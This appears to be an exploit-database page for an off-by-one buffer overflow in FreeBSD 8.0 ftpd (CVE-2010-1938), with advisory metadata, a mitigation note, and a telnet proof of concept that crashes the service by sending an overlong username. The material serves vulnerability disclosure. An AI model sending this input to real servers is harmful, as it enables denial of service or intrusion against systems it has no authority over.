FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

vendor:

FreeBSD 8.0

by:

Maksymilian Arciemowicz and Adam Zabrocki

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: FreeBSD 8.0

Affected Version From: 8.0

Affected Version To: 8.0

Patch Exists: YES

Related CWE: CVE-2010-1938

CPE: o:freebsd:freebsd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2010

FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

A buffer overflow vulnerability exists in the ftpd service of FreeBSD 8.0. An attacker can send an overly long username to the ftpd service, which can cause a stack-based buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of FreeBSD 8.0 or later.

Source

Exploit-DB raw data:

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://securityreason.com/achievement_securityalert/87
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#

PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

- -- 
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<cxib@securityreason.com>
sub 4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg